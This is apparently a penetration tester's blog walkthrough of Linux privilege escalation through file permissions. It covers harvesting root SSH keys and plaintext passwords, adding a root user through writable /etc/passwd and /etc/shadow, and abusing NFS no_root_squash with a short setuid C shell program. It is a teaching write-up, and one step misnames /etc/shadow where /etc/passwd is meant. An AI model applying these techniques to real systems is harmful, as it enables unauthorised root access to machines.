There are lots of way we can abuse file permissions, ranging from reading sensitive files to imitating a different user when creating a file.
SSH Private Keys
Searching for .ssh directories can be worthwhile if you net an SSH private key, in this case, one belonging to the root account.
Copy the key across to your machine, set strict permissions to it and use it to authenticate via SSH using the -i switch. Easy.
Plain Text Passwords
Searching for plain text passwords is something worth trying, I normally do this first if I gain a shell from a web service account such as www-data, you can easily stumble upon a hard coded password this way.
Other useful places to search are history and config files, in this case there is a command in .bash_history for the root account logging into mysql with a password on the command line, the same password was also found by searching for files with auth in their name.
We can simply use the password to su to the root account.
Writable Files
I always search for files owned by root that can be written to, in this case /etc/passwd and /etc/shadow are writable.
This is easy to exploit as we can abuse these files to create a new user with root privileges. Start by creating a new sha-512 encrypted password.
Write a new line to /etc/shadow containing our desired username and the generated password, after that I copy the rest of the entry from the root account entry.
Then write a line to /etc/shadow containing the same username followed by :x:0:0:root:<whatever home directory>:/bin/bash.
We can then use su to switch to the new user, which should have root permissions.
NFS Shares
NFS shares can be used to escalate privileges if the no_root_squash setting is active. We can check for this setting in /etc/exports.
Connecting to the NFS share is unsuccessful in this instance, I noticed mount was only attempting to connect using versions >4.1.
By setting the version to 3 we can successfully connect. As root squashing isn’t active, I switched to the root account on my machine, this will allow me to write files to the share as root and they will be preserved as such.
This can be abused by writing a simple setuid program in C:
#include <stdio.h>
#include <stdlib.h>
int main() {
setuid(0);
system("/bin/bash -p");
}We can then compile this and set the SUID bit.
Back on the target machine we can then navigate to the NFS share directory we wrote to and execute the compiled C file, granting a session with root permissions.
Dan Rigby PenTesting 